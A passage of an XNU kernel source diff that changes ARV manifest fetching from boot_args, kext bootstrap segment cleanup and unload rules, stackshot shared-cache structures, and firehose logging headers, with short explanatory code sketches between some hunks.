 IOBaseSystemARVRootHashAvailable(void)
 {
-       // Check if someone got the root hash before us
-       if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) {
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       if (args->bsARVRootHashStart == 0 || args->bsARVRootHashSize == 0) {
                return false;
        }
 
-       // Do we have in-memory root hash?
-       if (bsARVRootHashData) {
-               return true;
+       if (args->bsARVManifestStart == 0 || args->bsARVManifestSize == 0) {
+               return false;
        }
-       return false;
-}
 
-
-void
-IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData)
-{
-       return;
+       return true;
 }
 
-
 // ARV Manifest fetcher
 
-// Store in-memory Manifest
-void
-IOSetARVManifestData(IOMemoryDescriptor* arvData)
-{
-       // Do not allow re-fetching of the boot_args manifest by passing NULL here.
-       if (arvData) {
-               arvManifestData = arvData;
-               arvManifestFetched = 0;
-       }
-}
-
-// Retrieve any manifest we may have (stored in boot_args or in-memory)
+// Retrieve any manifest we may have (stored in boot_args)
 IOMemoryDescriptor*
 IOGetARVManifestData(void)
 {
        // Check if someone got the manifest before us
-       if (!OSCompareAndSwap(0, 1, &arvManifestFetched)) {
+       if (!OSCompareAndSwap(0, 1, &ARVManifestFetched)) {
                return NULL;
        }
 
-       // Do we have in-memory manifest?
-       if (arvManifestData) {
-               IOMemoryDescriptor* arvData = arvManifestData;
-               arvManifestData = NULL;
-               return arvData;
-       }
-
-       // Looks like there was no in-memory manifest and it's the first call - try boot_args
        boot_args* args = (boot_args*)PE_state.bootArgs;
 
        DEBG("%s: data at address %llu size %llu\n", __func__, args->arvManifestStart, args->arvManifestSize);
@@ -308,3 +278,32 @@ IOGetARVManifestData(void)
        DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
        return memoryDescriptor;
 }
+
+// Base System Analogue
+
+IOMemoryDescriptor*
+IOGetBaseSystemARVManifestData(void)
+{
+       // Check if someone got the base system manifest before us
+       if (!OSCompareAndSwap(0, 1, &bsARVManifestFetched)) {
+               return NULL;
+       }
+
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVManifestStart, args->bsARVManifestSize);
+       if (args->bsARVManifestStart == 0) {
+               return NULL;
+       }
+
+       // We have the manifest in the boot_args, create IOMemoryDescriptor for the blob
+       IOAddressRange ranges;
+       ranges.address = args->bsARVManifestStart;
+       ranges.length = args->bsARVManifestSize;
+
+       const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone;
+
+       IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options);
+       DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
+       return memoryDescriptor;
+}
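
All four ARV fetchers in this file share a one-shot guard: OSCompareAndSwap(0, 1, &fetched) lets exactly the first caller receive the descriptor, and every later caller gets NULL. A standalone C++ sketch of that claim-once pattern using std::atomic (illustrative only; the string stands in for the IOMemoryDescriptor):

    #include <atomic>
    #include <cstdio>

    static std::atomic<unsigned> fetched{0};

    // Returns a non-null "descriptor" only to the first caller.
    static const char *get_root_hash_once()
    {
        unsigned expected = 0;
        if (!fetched.compare_exchange_strong(expected, 1)) {
            return nullptr;                 // somebody already took it
        }
        return "root-hash-blob";
    }

    int main()
    {
        std::printf("first:  %s\n", get_root_hash_once() ? "got it" : "null");
        std::printf("second: %s\n", get_root_hash_once() ? "got it" : "null");
        return 0;
    }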
index ac67b43b553c8d26d1dd0e23da2800bdad2e7d80..7624171d6cafadf13606fea19b2a3c00640a3e05 100644 (file)
@@ -738,6 +738,6 @@ sysctl_iokittest(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, iokittest,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_iokittest, "I", "");
 #endif // __clang_analyzer__
index 8205d93bc8535b1efbf8ae5bf5db45255e180b2c..e2769e31b310ca04121986e117514458ddb94a5a 100644 (file)
@@ -55,6 +55,8 @@ extern dev_t mdevlookup(int devid);
 extern void mdevremoveall(void);
 extern int mdevgetrange(int devid, uint64_t *base, uint64_t *size);
 extern void di_root_ramfile(IORegistryEntry * entry);
+extern int IODTGetDefault(const char *key, void *infoAddr, unsigned int infoSize);
+extern boolean_t cpuid_vmm_present(void);
 
 #define ROUNDUP(a, b) (((a) + ((b) - 1)) & (~((b) - 1)))
 
@@ -544,6 +546,26 @@ do_reboot:
        return true;
 }
 
+int
+IOGetVMMPresent(void)
+{
+       int hv_vmm_present = 0;
+
+#if defined(__arm64__)
+       if (IODTGetDefault("vmm-present", &hv_vmm_present, sizeof(hv_vmm_present)) < 0) {
+               return 0;
+       }
+
+       if (hv_vmm_present != 0) {
+               hv_vmm_present = 1;
+       }
+#elif defined(__x86_64__)
+       hv_vmm_present = cpuid_vmm_present();
+#endif
+
+       return hv_vmm_present;
+}
+
 kern_return_t
 IOFindBSDRoot( char * rootName, unsigned int rootNameSize,
     dev_t * root, u_int32_t * oflags )
index f2eaf624cbea7198077c96f2a903a4a4c69bac08..d57bd0c27ef979ff79b0014f49f8d6993e024da1 100644 (file)
@@ -492,7 +492,7 @@ struct kcdata_type_definition {
 #define STACKSHOT_KCTYPE_TASK_SNAPSHOT               0x905u /* task_snapshot_v2 */
 #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT             0x906u /* thread_snapshot_v2, thread_snapshot_v3 */
 #define STACKSHOT_KCTYPE_DONATING_PIDS               0x907u /* int[] */
-#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */
+#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* dyld_shared_cache_loadinfo */
 #define STACKSHOT_KCTYPE_THREAD_NAME                 0x909u /* char[] */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME             0x90Au /* struct stack_snapshot_frame32 */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME64           0x90Bu /* struct stack_snapshot_frame64 */
@@ -556,17 +556,42 @@ struct dyld_uuid_info_64 {
        uuid_t   imageUUID;
 };
 
+/*
+ * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures
+ * instead of this, since the field names match their contents better.
+ */
 struct dyld_uuid_info_64_v2 {
        uint64_t imageLoadAddress; /* XXX image slide */
        uuid_t   imageUUID;
        /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
-       uint64_t imageSlidBaseAddress; /* slid base address of image */
+       uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */
+};
+
+/*
+ * This is the renamed version of dyld_uuid_info_64 with more accurate
+ * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO.  Any users
+ * must be aware of the dyld_uuid_info_64* version history and ensure
+ * the fields they are accessing are within the actual bounds.
+ *
+ * OLD_FIELD              NEW_FIELD
+ * imageLoadAddress       sharedCacheSlide
+ * imageUUID              sharedCacheUUID
+ * imageSlidBaseAddress   sharedCacheUnreliableSlidBaseAddress
+ * -                      sharedCacheSlidFirstMapping
+ */
+struct dyld_shared_cache_loadinfo {
+       uint64_t sharedCacheSlide;      /* image slide value */
+       uuid_t   sharedCacheUUID;
+       /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
+       uint64_t sharedCacheUnreliableSlidBaseAddress;  /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */
+       /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */
+       uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */
 };
 
 struct dyld_aot_cache_uuid_info {
-       uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */
+       uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */
        uuid_t x86UUID; /* UUID of x86 shared cache */
-       uint64_t aotSlidBaseAddress; /* slide base address of aot cache */
+       uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */
        uuid_t aotUUID; /* UUID of aot shared cache */
 };
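
As the comment above struct dyld_shared_cache_loadinfo warns, consumers must check which version of the record they were handed before touching the newer fields. A small C++ sketch of that bounds check, assuming only the layout shown in this header (the local view struct mirrors it for illustration):

    #include <cstddef>
    #include <cstdint>
    #include <cstring>

    struct shared_cache_loadinfo_view {
        uint64_t sharedCacheSlide;
        uint8_t  sharedCacheUUID[16];
        uint64_t sharedCacheUnreliableSlidBaseAddress;   // v2 field
        uint64_t sharedCacheSlidFirstMapping;            // v3 field
    };

    // Pick the best available base address from a possibly-truncated record,
    // per the version history documented above. Illustrative only.
    static uint64_t shared_cache_base(const void *payload, size_t size)
    {
        shared_cache_loadinfo_view info{};
        std::memcpy(&info, payload, size < sizeof(info) ? size : sizeof(info));

        if (size >= offsetof(shared_cache_loadinfo_view, sharedCacheSlidFirstMapping) + sizeof(uint64_t)) {
            return info.sharedCacheSlidFirstMapping;            // v3: preferred
        }
        if (size >= offsetof(shared_cache_loadinfo_view, sharedCacheUnreliableSlidBaseAddress) + sizeof(uint64_t)) {
            return info.sharedCacheUnreliableSlidBaseAddress;   // v2 fallback
        }
        return 0;                                               // v1: only slide + UUID present
    }

    int main()
    {
        shared_cache_loadinfo_view v{};
        v.sharedCacheSlidFirstMapping = 0x180000000ULL;
        return shared_cache_base(&v, sizeof(v)) == 0x180000000ULL ? 0 : 1;
    }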
 
@@ -618,6 +643,9 @@ enum task_snapshot_flags {
        kTaskIsDirtyTracked                   = 0x4000000,
        kTaskAllowIdleExit                    = 0x8000000,
        kTaskIsTranslated                     = 0x10000000,
+       kTaskSharedRegionNone                 = 0x20000000,     /* task doesn't have a shared region */
+       kTaskSharedRegionSystem               = 0x40000000,     /* task is attached to system shared region */
+       kTaskSharedRegionOther                = 0x80000000,     /* task is attached to a different shared region */
 };
 
 enum thread_snapshot_flags {
@@ -876,6 +904,12 @@ struct stackshot_duration {
        uint64_t stackshot_duration_outer;
 } __attribute__((packed));
 
+struct stackshot_duration_v2 {
+       uint64_t stackshot_duration;
+       uint64_t stackshot_duration_outer;
+       uint64_t stackshot_duration_prior;
+} __attribute__((packed));
+
 struct stackshot_fault_stats {
        uint32_t sfs_pages_faulted_in;      /* number of pages faulted in using KDP fault path */
        uint64_t sfs_time_spent_faulting;   /* MATUs spent faulting */
index cca45ba6c6f7412c1e56a4f5b517141400b4a19a..11d38b06898557dc6fcd31ad21e40525aa204446 100644 (file)
@@ -157,9 +157,14 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s
 
        case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: {
                i = 0;
+               /*
+                * for backwards compatibility, we keep the old field names, but the
+                * new data is being put in dyld_shared_cache_loadinfo
+                */
                _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageLoadAddress);
                _SUBTYPE_ARRAY(KC_ST_UINT8, struct dyld_uuid_info_64_v2, imageUUID, 16);
                _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageSlidBaseAddress);
+               _SUBTYPE(KC_ST_UINT64, struct dyld_shared_cache_loadinfo, sharedCacheSlidFirstMapping);
                setup_type_definition(retval, type_id, i, "shared_cache_dyld_load_info");
                break;
        }
@@ -546,10 +551,12 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s
 
        case STACKSHOT_KCTYPE_STACKSHOT_DURATION: {
                i = 0;
-               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration);
-               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration_outer);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_outer);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_prior);
                subtypes[0].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
                subtypes[1].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
+               subtypes[2].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
                setup_type_definition(retval, type_id, i, "stackshot_duration");
                break;
        }
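A compile-time sketch (not from this change) of the layout assumption the versioned duration structures rely on: stackshot_duration_v2 must remain a prefix-compatible extension of stackshot_duration, so existing readers of the first two fields keep working and only stackshot_duration_prior is appended.

#include <stddef.h>

_Static_assert(offsetof(struct stackshot_duration_v2, stackshot_duration_outer) ==
    offsetof(struct stackshot_duration, stackshot_duration_outer),
    "v2 must keep the original field layout as a prefix");
_Static_assert(sizeof(struct stackshot_duration_v2) ==
    sizeof(struct stackshot_duration) + sizeof(uint64_t),
    "v2 appends exactly one 64-bit field");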
index 8b7c090e35ac80810187351efd7822c879e7302f..009375baa2696d045cab3a3af590b7187b12569e 100644 (file)
@@ -975,7 +975,9 @@ OSKext::removeKextBootstrap(void)
        int                        dt_symtab_size        = 0;
        int                        dt_result             = 0;
 
-       kernel_segment_command_t * seg_to_remove         = NULL;
+       kernel_segment_command_t * seg_kld               = NULL;
+       kernel_segment_command_t * seg_klddata           = NULL;
+       kernel_segment_command_t * seg_linkedit          = NULL;
 
        const char __unused      * dt_segment_name       = NULL;
        void       __unused      * segment_paddress      = NULL;
@@ -1015,42 +1017,60 @@ OSKext::removeKextBootstrap(void)
        }
 
        /*****
-        * KLD bootstrap segment.
+        * KLD & KLDDATA bootstrap segments.
         */
        // xxx - should rename KLD segment
-       seg_to_remove = getsegbyname("__KLD");
-       if (seg_to_remove) {
-               OSRuntimeUnloadCPPForSegment(seg_to_remove);
+       seg_kld = getsegbyname("__KLD");
+       seg_klddata = getsegbyname("__KLDDATA");
+       if (seg_klddata) {
+               // __mod_term_func is part of __KLDDATA
+               OSRuntimeUnloadCPPForSegment(seg_klddata);
        }
 
 #if __arm__ || __arm64__
-       /* Free the memory that was set up by bootx.
+       /* Free the memory that was set up by iBoot.
+        */
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* We cannot free the KLD segment with CTRR enabled as it contains text and
+        * is covered by the contiguous rorgn.
         */
        dt_segment_name = "Kernel-__KLD";
        if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) {
-               /* We cannot free this with KTRR enabled, as we cannot
-                * update the permissions on the KLD range this late
-                * in the boot process.
-                */
                IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress,
-                   (int)segment_size);
+                   (int)segment_size); // calls ml_static_mfree
+       } else if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) {
+               /* With fileset KCs, the Kernel KLD segment is not recorded in the DT. */
+               ml_static_mfree(ml_static_ptovirt(seg_kld->vmaddr - gVirtBase + gPhysBase),
+                   seg_kld->vmsize);
+       }
+#endif
+       dt_segment_name = "Kernel-__KLDDATA";
+       if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) {
+               IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress,
+                   (int)segment_size);  // calls ml_static_mfree
+       } else if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) {
+               /* With fileset KCs, the Kernel KLDDATA segment is not recorded in the DT. */
+               ml_static_mfree(ml_static_ptovirt(seg_klddata->vmaddr - gVirtBase + gPhysBase),
+                   seg_klddata->vmsize);
        }
 #elif __i386__ || __x86_64__
        /* On x86, use the mapping data from the segment load command to
-        * unload KLD directly.
+        * unload KLD & KLDDATA directly.
         * This may invalidate any assumptions about  "avail_start"
         * defining the lower bound for valid physical addresses.
         */
-       if (seg_to_remove && seg_to_remove->vmaddr && seg_to_remove->vmsize) {
-               bzero((void *)seg_to_remove->vmaddr, seg_to_remove->vmsize);
-               ml_static_mfree(seg_to_remove->vmaddr, seg_to_remove->vmsize);
+       if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) {
+               bzero((void *)seg_kld->vmaddr, seg_kld->vmsize);
+               ml_static_mfree(seg_kld->vmaddr, seg_kld->vmsize);
+       }
+       if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) {
+               bzero((void *)seg_klddata->vmaddr, seg_klddata->vmsize);
+               ml_static_mfree(seg_klddata->vmaddr, seg_klddata->vmsize);
        }
 #else
 #error arch
 #endif
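A hedged sketch of the address arithmetic in the fileset-KC fallback above (the helper name is illustrative, and it only applies on arm where gVirtBase/gPhysBase exist): the segment's kernelcache virtual address is rebased through gVirtBase/gPhysBase into a physical address, and ml_static_ptovirt() then yields the static-mapping address that ml_static_mfree() expects.

static vm_offset_t
kc_segment_static_vaddr(kernel_segment_command_t *seg)
{
        /* vmaddr - gVirtBase is the offset into the kernelcache;
         * adding gPhysBase turns it into a physical address. */
        return ml_static_ptovirt(seg->vmaddr - gVirtBase + gPhysBase);
}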
 
-       seg_to_remove = NULL;
-
        /*****
         * Prelinked kernel's symtab (if there is one).
         */
@@ -1062,7 +1082,7 @@ OSKext::removeKextBootstrap(void)
                }
        }
 
-       seg_to_remove = (kernel_segment_command_t *)getsegbyname("__LINKEDIT");
+       seg_linkedit = (kernel_segment_command_t *)getsegbyname("__LINKEDIT");
 
        /* kxld always needs the kernel's __LINKEDIT segment, but we can make it
         * pageable, unless keepsyms is set.  To do that, we have to copy it from
@@ -1084,9 +1104,9 @@ OSKext::removeKextBootstrap(void)
                vm_map_offset_t seg_copy_offset = 0;
                vm_map_size_t seg_length = 0;
 
-               seg_data = (void *) seg_to_remove->vmaddr;
-               seg_offset = (vm_map_offset_t) seg_to_remove->vmaddr;
-               seg_length = (vm_map_size_t) seg_to_remove->vmsize;
+               seg_data = (void *) seg_linkedit->vmaddr;
+               seg_offset = (vm_map_offset_t) seg_linkedit->vmaddr;
+               seg_length = (vm_map_size_t) seg_linkedit->vmsize;
 
                /* Allocate space for the LINKEDIT copy.
                 */
@@ -1169,8 +1189,6 @@ OSKext::removeKextBootstrap(void)
        }
 #endif // VM_MAPPED_KEXTS
 
-       seg_to_remove = NULL;
-
        result = kOSReturnSuccess;
 
        return result;
@@ -1590,7 +1608,7 @@ bool
 OSKext::setAutounloadEnabled(bool flag)
 {
        bool result = flags.autounloadEnabled ? true : false;
-       flags.autounloadEnabled = flag ? 1 : 0;
+       flags.autounloadEnabled = flag ? (0 == flags.unloadUnsupported) : 0;
 
        if (result != (flag ? true : false)) {
                OSKextLog(this,
@@ -1891,6 +1909,8 @@ OSKext::initWithPrelinkedInfoDict(
                                getPropertyForHostArch(kOSBundleAllowUserLoadKey) == kOSBooleanTrue);
                        if (shouldSaveSegments) {
                                flags.resetSegmentsFromImmutableCopy = 1;
+                       } else {
+                               flags.unloadUnsupported = 1;
                        }
                        break;
                case KCKindPageable:
@@ -1901,6 +1921,8 @@ OSKext::initWithPrelinkedInfoDict(
                                flags.resetSegmentsFromImmutableCopy = 1;
                        } else if (resetAuxKCSegmentOnUnload) {
                                flags.resetSegmentsFromVnode = 1;
+                       } else {
+                               flags.unloadUnsupported = 1;
                        }
                        break;
                default:
@@ -4084,6 +4106,15 @@ OSKext::removeKext(
                if (aKext->countRequestCallbacks()) {
                        goto finish;
                }
+               if (aKext->flags.unloadUnsupported) {
+                       result = kOSKextReturnInUse;
+                       OSKextLog(aKext,
+                           kOSKextLogErrorLevel |
+                           kOSKextLogKextBookkeepingFlag,
+                           "Can't remove kext %s; unsupported by cache.",
+                           aKext->getIdentifierCString());
+                       goto finish;
+               }
 
                /* If we are terminating, send the request to the IOCatalogue
                 * (which will actually call us right back but that's ok we have
@@ -8978,7 +9009,7 @@ OSKext::addClass(
                                    getIdentifierCString(),
                                    aClass->getClassName());
 
-                               flags.autounloadEnabled = 1;
+                               flags.autounloadEnabled = (0 == flags.unloadUnsupported);
                                break;
                        }
                }
@@ -11829,6 +11860,24 @@ OSKext::loadFileSetKexts(OSDictionary * requestDict __unused)
        allow_fileset_load = false;
 #endif
 
+       /*
+        * Change with 70582300
+        */
+#if 0 || !defined(VM_MAPPED_KEXTS)
+       /*
+        * On platforms that don't support the SystemKC or a file-backed
+        * AuxKC, the kext receipt for 3rd party kexts loaded by the booter
+        * needs to be queried before we load any codeless kexts or release
+        * any 3rd party kexts to run. On platforms that support a file-backed
+        * AuxKC, this process is done via the kext audit mechanism.
+        */
+
+       printf("KextLog: waiting for kext receipt to be queried.\n");
+       while (!IOServiceWaitForMatchingResource(kOSKextReceiptQueried, UINT64_MAX)) {
+               IOSleep(30);
+       }
+#endif /* !VM_MAPPED_KEXTS */
+
        /*
         * Get the args from the request. Right now we need the file
         * name for the pageable and the aux kext collection file sets.
@@ -11910,6 +11959,21 @@ try_auxkc:
                OSDictionary          *infoDict;
                parsedXML = consumeDeferredKextCollection(KCKindAuxiliary);
                infoDict = OSDynamicCast(OSDictionary, parsedXML.get());
+#if !defined(VM_MAPPED_KEXTS)
+               /*
+                * On platforms where we don't dynamically wire-down / page-in
+                * kext memory, we need to maintain the invariant that if the
+                * AuxKC in memory does not contain a kext receipt, then we
+                * should not load any of the kexts.
+                */
+               size_t receipt_sz = 0;
+               if (getsectdatafromheader(akc_mh, kReceiptInfoSegment, kAuxKCReceiptSection, &receipt_sz) == NULL || receipt_sz == 0) {
+                       OSKextLog(/* kext */ NULL, kOSKextLogErrorLevel | kOSKextLogArchiveFlag,
+                           "KextLog: WARNING: Failed to load AuxKC from memory: missing receipt");
+                       ret = kOSKextReturnKCLoadFailure;
+                       goto try_codeless;
+               }
+#endif
                if (infoDict) {
                        bool added;
                        printf("KextLog: Adding kexts from in-memory AuxKC\n");
@@ -15251,6 +15315,17 @@ OSKextSavedMutableSegment::restoreContents(kernel_segment_command_t *seg)
        return kOSReturnSuccess;
 }
 
+extern "C" kern_return_t
+OSKextSetReceiptQueried(void)
+{
+       OSKextLog(/* kext */ NULL,
+           kOSKextLogStepLevel | kOSKextLogGeneralFlag,
+           "Setting kext receipt as queried");
+
+       IOService::publishResource(kOSKextReceiptQueried, kOSBooleanTrue);
+       return KERN_SUCCESS;
+}
+
 extern "C" const vm_allocation_site_t *
 OSKextGetAllocationSiteForCaller(uintptr_t address)
 {
index 40bd13b6fea0bbd3e13c773b82e3a92ee7c90fe6..de210c18afd7cb46b9de20c31c06bed2986544d1 100644 (file)
@@ -330,7 +330,14 @@ finish:
 }
 
 #if defined(HAS_APPLE_PAC)
-static inline void
+#if !KASAN
+/*
+ * Place this function in __KLD,__text on non-kasan builds so it gets unmapped
+ * after CTRR lockdown.
+ */
+__attribute__((noinline, section("__KLD,__text")))
+#endif
+static void
 OSRuntimeSignStructorsInSegment(kernel_segment_command_t *segment)
 {
        kernel_section_t         * section;
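The same placement trick, sketched in isolation (the function below is illustrative, not part of the change): code that must only run during early boot can be compiled into __KLD,__text so that it is jettisoned along with the rest of the bootstrap segments once removeKextBootstrap() frees them.

#if !KASAN
__attribute__((noinline, section("__KLD,__text")))
#endif
static void
early_boot_only_routine(void)
{
        /* Must never be reachable after the __KLD segment has been freed. */
}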
index e5b444617afdf6e9ffeb96f4d4ae2eed4e30785c..0ffca5b4f2b880cb5c6189d14b8b249adfb6386f 100644 (file)
@@ -55,6 +55,8 @@ libkern/stdio/scanf.c                                 standard
 libkern/uuid/uuid.c                                    standard
 
 libkern/os/log.c                                       standard
+libkern/os/log_encode.c                                        standard
+libkern/os/log_mem.c                                   standard
 libkern/os/object.c                                    standard
 libkern/os/internal.c                                  standard
 libkern/os/refcnt.c                                    standard
@@ -96,6 +98,8 @@ libkern/crypto/corecrypto_rand.c              optional crypto
 libkern/crypto/corecrypto_rsa.c                    optional crypto
 libkern/crypto/corecrypto_chacha20poly1305.c   optional        crypto
 
+libkern/coretrust/coretrust.c   standard
+
 libkern/img4/interface.c               standard
 
 libkern/stack_protector.c       standard
diff --git a/libkern/coretrust/coretrust.c b/libkern/coretrust/coretrust.c
new file mode 100644 (file)
index 0000000..4a8f08b
--- /dev/null
@@ -0,0 +1,18 @@
+#include <libkern/libkern.h>
+#include <libkern/section_keywords.h>
+#include <libkern/coretrust/coretrust.h>
+
+#if defined(SECURITY_READ_ONLY_LATE)
+SECURITY_READ_ONLY_LATE(const coretrust_t *) coretrust = NULL;
+#else
+const coretrust_t *coretrust = NULL;
+#endif
+
+void
+coretrust_interface_register(const coretrust_t *ct)
+{
+       if (coretrust) {
+               panic("coretrust interface already set");
+       }
+       coretrust = ct;
+}
index ac3fbe92efdf81560c39bbb7b8bcdabe39835852..513fd208296d288173695c800e102a54ccf1cc3e 100644 (file)
@@ -64,6 +64,7 @@ typedef struct firehose_chunk_range_s {
        uint16_t fcr_length;
 } *firehose_chunk_range_t;
 
+#if __has_include(<os/atomic_private.h>)
 #if defined(KERNEL) || defined(OS_FIREHOSE_SPI)
 
 OS_ALWAYS_INLINE
@@ -181,6 +182,7 @@ firehose_chunk_tracepoint_end(firehose_chunk_t fc,
 #endif // OS_ATOMIC_HAS_STARVATION_FREE_RMW || !OS_ATOMIC_CONFIG_STARVATION_FREE_ONLY
 
 #endif // defined(KERNEL) || defined(OS_FIREHOSE_SPI)
+#endif // __has_include(<os/atomic_private.h>)
 
 __END_DECLS
 
index 27fef14484d27a7d7a8561bc526d9fa804ab327f..9770351bf0c11cc1d5d92c4a57eb8615b385de75 100644 (file)
@@ -78,6 +78,7 @@ OS_ENUM(firehose_stream, uint8_t,
     firehose_stream_memory_baseband             = 6,
 
     _firehose_stream_max,
+    _firehose_stream_disabled = (uint8_t)-1,
     );
 
 /*!
@@ -131,9 +132,10 @@ OS_OPTIONS(firehose_tracepoint_flags, uint16_t,
         _firehose_tracepoint_flags_pc_style_main_plugin         = 0x0003 << 1,
         _firehose_tracepoint_flags_pc_style_absolute            = 0x0004 << 1,
         _firehose_tracepoint_flags_pc_style_uuid_relative       = 0x0005 << 1,
-        _firehose_tracepoint_flags_pc_style__unused6            = 0x0006 << 1,
+        _firehose_tracepoint_flags_pc_style_large_shared_cache  = 0x0006 << 1,
         _firehose_tracepoint_flags_pc_style__unused7            = 0x0007 << 1,
         _firehose_tracepoint_flags_base_has_unique_pid          = 0x0010,
+        _firehose_tracepoint_flags_base_has_large_offset        = 0x0020,
     );
 
 /*
@@ -264,14 +266,18 @@ OS_ENUM(_firehose_tracepoint_type_signpost, firehose_tracepoint_type_t,
  * @abstract
  * Flags for Log tracepoints (namespace signpost).
  *
- * When flags are shared with the log type, they should havethe same values.
+ * When flags are shared with the log type, they should have the same values.
  */
 OS_OPTIONS(_firehose_tracepoint_flags_signpost, uint16_t,
+    // shared with log
     _firehose_tracepoint_flags_signpost_has_private_data    = 0x0100,
     _firehose_tracepoint_flags_signpost_has_subsystem       = 0x0200,
     _firehose_tracepoint_flags_signpost_has_rules           = 0x0400,
     _firehose_tracepoint_flags_signpost_has_oversize        = 0x0800,
     _firehose_tracepoint_flags_signpost_has_context_data    = 0x1000,
+
+    // specific to signpost
+    _firehose_tracepoint_flags_signpost_has_name            = 0x8000,
     );
 
 /* MIG firehose push reply structure */
index 69c04c982b3bcf6ebf4fac5e9f984ea96ab7c999..70c24872267686a6ba8d64620f89d3744bb3e46e 100644 (file)
 #if KERNEL
 #include <atm/atm_internal.h>
 #endif
+#if __has_include(<os/atomic_private.h>)
 #include <os/atomic_private.h>
+#else
+#include <os/internal/internal_shared.h>
+#endif
 #include "firehose_types_private.h"
 
 OS_ASSUME_NONNULL_BEGIN
index 3f78b8f25b537b0648aa5af94f79fb76e9b94e33..c7b51b5e61b6df2829103ea8d95fbc5d8871c2fb 100644 (file)
@@ -10,7 +10,8 @@ INSTINC_SUBDIRS = \
     machine \
     c++ \
     crypto \
-    img4
+    img4 \
+    coretrust
 INSTINC_SUBDIRS_X86_64 = \
         i386
 INSTINC_SUBDIRS_X86_64H = \
index 6297be81cdbd9671f862936209603a3e2fa8fa96..90d7aaede4ec2f3f57631dfb68affd65fbaf9cb8 100644 (file)
@@ -786,6 +786,12 @@ void kext_dump_panic_lists(int (*printf_func)(const char *fmt, ...));
 
 #ifdef XNU_KERNEL_PRIVATE
 
+/*!
+ * @define kOSKextReceiptQueried
+ * @abstract Whether or not the kext receipt has been successfully loaded.
+ */
+#define kOSKextReceiptQueried  "OSKextReceiptQueried"
+
 #if PRAGMA_MARK
 #pragma mark -
 /********************************************************************/
@@ -981,6 +987,7 @@ extern const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t a
 extern uint32_t                     OSKextGetKmodIDForSite(const vm_allocation_site_t * site,
     char * name, vm_size_t namelen);
 extern void                         OSKextFreeSite(vm_allocation_site_t * site);
+extern kern_return_t                OSKextSetReceiptQueried(void);
 
 #if CONFIG_IMAGEBOOT
 extern int OSKextGetUUIDForName(const char *, uuid_t);
index aff03853347308737203962442ab9f5c89d108f5..cc456e2541b0f0040e88d59b246ee07a2dee2e55 100644 (file)
@@ -315,6 +315,7 @@ private:
                unsigned int CPPInitialized:1;
                unsigned int jettisonLinkeditSeg:1;
                unsigned int resetSegmentsFromImmutableCopy:1;
+               unsigned int unloadUnsupported:1;
        } flags;
 
        uint32_t matchingRefCount;
index c8cd5025fa5e764b4ccfc8cff5ceb3cba5e9d57f..463eb6a89ff352bcb22a1ae2744132bb91a96271 100644 (file)
@@ -117,12 +117,12 @@ protected:
 
        unsigned int   flags:14,
            length:18;
-       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;;
+       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;
 
 #else /* APPLE_KEXT_ALIGN_CONTAINERS */
 
 protected:
-       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;;
